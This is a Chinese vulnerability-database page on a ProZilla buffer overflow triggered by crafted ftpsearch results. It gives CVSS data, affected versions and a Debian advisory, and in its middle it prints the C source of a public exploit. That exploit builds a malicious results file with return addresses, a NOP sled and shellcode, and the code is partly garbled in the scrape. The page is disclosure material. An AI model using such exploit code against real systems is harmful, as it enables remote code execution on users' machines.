发布时间 :2005-10-05 15:02:00
修订时间 :2017-07-10 21:33:03

[原文]Buffer overflow in the get_string_ahref function for ProZilla and possibly earlier, with the -ftpsearch option enabled, allows remote servers to execute arbitrary code via a search response with a crafted string in the HREF field of an <A> tag.

[CNNVD]ProZilla 缓冲区溢出漏洞(CNNVD-200510-019)

        ProZilla及可能的早期版本的get_string_ahref函数在启用 -ftpsearch选项时存在缓冲区溢出。远程攻击者可以借助标签的HREF字段中含有特制字符串的检索响应,执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  14993
(UNKNOWN)  XF  prozilla-ftpsearch-bo(22491)

- 漏洞信息

ProZilla 缓冲区溢出漏洞
高危 缓冲区溢出
2005-10-05 00:00:00 2006-04-07 00:00:00
        ProZilla及可能的早期版本的get_string_ahref函数在启用 -ftpsearch选项时存在缓冲区溢出。远程攻击者可以借助标签的HREF字段中含有特制字符串的检索响应,执行任意代码。

- 公告与补丁


- 漏洞信息 (1238)

Prozilla <= (ftpsearch) Results Handling Buffer Overflow Exploit (EDBID:1238)
linux remote
2005-10-02 Verified
8080 taviso
N/A [点击下载]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define OVERFLOW (1<<10)+32
#define SLEDSIZ (1<<10)
#define RETADDR 0x806977a+SLEDSIZ/2
#define OUTPUT "AdvResults.asp"

* prozilla bug, found while auditing for gentoo bug #70090 

/* execve() /bin/id */
unsigned char shellcode[] =

int main(int argc, char **argv)
unsigned char *buf;
void *ret = (void *) RETADDR;
FILE *exploit;
int i;

exploit = fopen(OUTPUT, "w");
fprintf(exploit, "<PRE><A HREF=>");

buf = malloc(OVERFLOW);
for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
memcpy(buf + i, &ret, sizeof(void *));
fwrite(buf, OVERFLOW, 1, exploit);
fprintf(exploit, "</A><A HREF=></A><A HREF=></A></PRE>");
buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
fprintf(stderr, "[*] %s created.\n", OUTPUT);
return 0;

// [2005-10-02]

- 漏洞信息 (F40463)

prozilla.c (PacketStormID:F40463)
2005-10-06 00:00:00

ProZilla versions and below ftpsearch results handling client-side buffer overflow exploit.

- 漏洞信息 (F40369)

Debian Linux Security Advisory 834-1 (PacketStormID:F40369)
2005-10-04 00:00:00

Debian Security Advisory DSA 834-1 - Tavis Ormandy discovered a buffer overflow in prozilla, a multi-threaded download accelerator, which may be exploited to execute arbitrary code.

Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 834-1                                        Martin Schulze
October 1st, 2005             
- --------------------------------------------------------------------------

Package        : prozilla
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2961

Tavis Ormandy discovered a buffer overflow in prozilla, a
multi-threaded download accelerator, which may be exploited to execute
arbitrary code.

For the old stable distribution (woody) this problem has been fixed in
version 1.3.6-3woody3.

The stable distribution (sarge) does not contain prozilla packages.

The unstable distribution (sid) does not contain prozilla packages.

We recommend that you upgrade your prozilla package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:
      Size/MD5 checksum:      612 66c3a184d2185a18a2e20b173c6835c7
      Size/MD5 checksum:     9891 32d706f874d8c4fba1c1eed7111cd292
      Size/MD5 checksum:   152755 65864dfe72f5cb7d7e595ca6f34fc7d7

  Alpha architecture:
      Size/MD5 checksum:    78514 6183e73c5841beee0d8e9cc450a6c702

  ARM architecture:
      Size/MD5 checksum:    65506 595b0c25a968731fc39dd9644cccf9ba

  Intel IA-32 architecture:
      Size/MD5 checksum:    64514 8c4c382318cb97f659736dc1ea017335

  Intel IA-64 architecture:
      Size/MD5 checksum:    93574 ab60cc2fc3cac11774217fec4fe9da56

  HP Precision architecture:
      Size/MD5 checksum:    74560 a3443807a553e685573f9f34aa2cbe71

  Motorola 680x0 architecture:
      Size/MD5 checksum:    61492 e295c8293423298836b5ea829ccd2f18

  Big endian MIPS architecture:
      Size/MD5 checksum:    73168 16ebff4a693d9fb1b96c1814045edd22

  Little endian MIPS architecture:
      Size/MD5 checksum:    73234 85e2da96f32feb26af7600faeac69820

  PowerPC architecture:
      Size/MD5 checksum:    68628 b95100d9ef36bd36649118b2dee08a0c

  IBM S/390 architecture:
      Size/MD5 checksum:    65556 bf4165b94d5a28e591d5fdc10b46d94d

  Sun Sparc architecture:
      Size/MD5 checksum:    68174 3ff8ca31ef5d0e124a1e8714506a861f

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb stable/updates main
For dpkg-ftp: dists/stable/updates/main
Mailing list:
Package info: `apt-cache show <pkg>' and<pkg>

Version: GnuPG v1.4.1 (GNU/Linux)


Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

- 漏洞信息

ProZilla --ftpsearch Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-10-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

ProZilla Buffer Overflow Vulnerability
Boundary Condition Error 14993
Yes No
2005-10-01 12:00:00 2009-07-12 05:06:00
Discovered by Tavis Ormandy.

- 受影响的程序版本

Prozilla ProZilla Download Accelerator 1.3.7 .4
Prozilla ProZilla Download Accelerator 1.3.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Prozilla ProZilla Download Accelerator 1.3.5 .2
Prozilla ProZilla Download Accelerator 1.3.5 .1
Prozilla ProZilla Download Accelerator 1.3.5
Prozilla ProZilla Download Accelerator 1.3.4
Prozilla ProZilla Download Accelerator 1.3.3 .x
Prozilla ProZilla Download Accelerator 1.3.3
Prozilla ProZilla Download Accelerator 1.3.2
Prozilla ProZilla Download Accelerator 1.3.1
Prozilla ProZilla Download Accelerator 1.3 .0
Prozilla ProZilla Download Accelerator 1.0 x
Prozilla ProZilla Download Accelerator

- 漏洞讨论

ProZilla is prone to a buffer overflow vulnerability. This issue is due to the failure of the application to properly bounds check user-supplied input prior to copying it to an insufficiently sized memory buffer.

Arbitrary code execution in the context of the user running the application is possible.

- 漏洞利用

An exploit by &lt;; is available:

- 解决方案

Debian has released advisory DSA 834-1 and fixes to address this issue. Please see the referenced advisory for further information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: <>.

Prozilla ProZilla Download Accelerator 1.3.6

- 相关参考